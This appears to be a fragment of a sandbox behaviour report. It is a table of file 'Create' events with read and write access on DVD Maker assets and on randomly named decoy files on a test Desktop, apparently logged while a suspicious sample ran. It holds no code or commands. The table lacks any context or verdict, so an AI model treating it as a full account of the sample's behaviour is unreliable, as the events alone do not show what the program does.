| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\b.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\menu_style_default_Thumbnail.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationLeft_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationLeft_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationRight_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationRight_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationUp_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationUp_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_buttongraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_selectionsubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_videoinset.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_VideoInset.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_babypink_Thumbnail.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_glass_Thumbnail.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_highlights_Thumbnail.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_performance_Thumbnail.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_photo_Thumbnail.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_plain_Thumbnail.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_postage_Thumbnail.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_scrapbook_Thumbnail.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_specialocc_Thumbnail.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_travel_Thumbnail.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_widescreen_Thumbnail.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\scene_button_style_default_Thumbnail.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_buttongraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_selectionsubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_videoinset.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\WhiteDot.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Cj5z8Sw9v7O.ods | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\babyblue.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\LightBlueRectangle.PNG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\MainMenuButtonIcon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\navSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_leftarrow.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_rightarrow.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_uparrow.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\c_qKiZxj_.avi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-background.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-highlight.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-image-mask.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\babypink.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\background.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\bear_formatted_matte2.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\Bear_Formatted_MATTE2_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\bear_formatted_rgb6.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\Bear_Formatted_RGB6_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-back-static.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-next-static.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-previous-static.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\button-highlight.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\chapters-static.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\content-background.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\content-foreground.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\curtains.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_precomp_matte.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_PreComp_MATTE_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_matte.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\dY0yl5mK9vD.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_MATTE_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_rgb.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_RGB_PAL.wmv | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\highlight.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\mainimage-mask.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\notes-static.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\play-static.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ejaysz9GSkSB.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\1047x576black.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\203x8subpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationLeft_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationLeft_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationRight_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationRight_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationUp_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationUp_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\pagecurl.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Et7K.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Full\1047x576black.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Full\15x15dot.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Full\dotsdarkoverlay.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Full\dotslightoverlay.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Full\full.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationLeft_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationLeft_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationRight_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationRight_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationUp_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationUp_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Full\pushplaysubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Fe3xoXvZ.m4a | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\1047x576black.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\15x15dot.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\colorcycle.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\huemainsubpicture2.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationLeft_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationLeft_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationRight_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationRight_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationUp_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationUp_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\title_stripe.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\1047x576black.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\203x8subpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\blackbars60.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\layers.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationLeft_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationLeft_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\fjTg.doc | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationRight_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationRight_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationUp_ButtonGraphic.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationUp_SelectionSubpicture.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\H4aSLRpC.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-background.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-highlight.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-image-mask.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-overlay.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\background.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\btn-back-static.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\btn-next-static.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\btn-previous-static.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-highlight.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-overlay.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Memories_buttonClear.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Notes_btn-back-static.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Notes_content-background.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\I4Iad0fPEqg6-9Mh.ppt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
3 | |
| Create | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\scrapbook.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
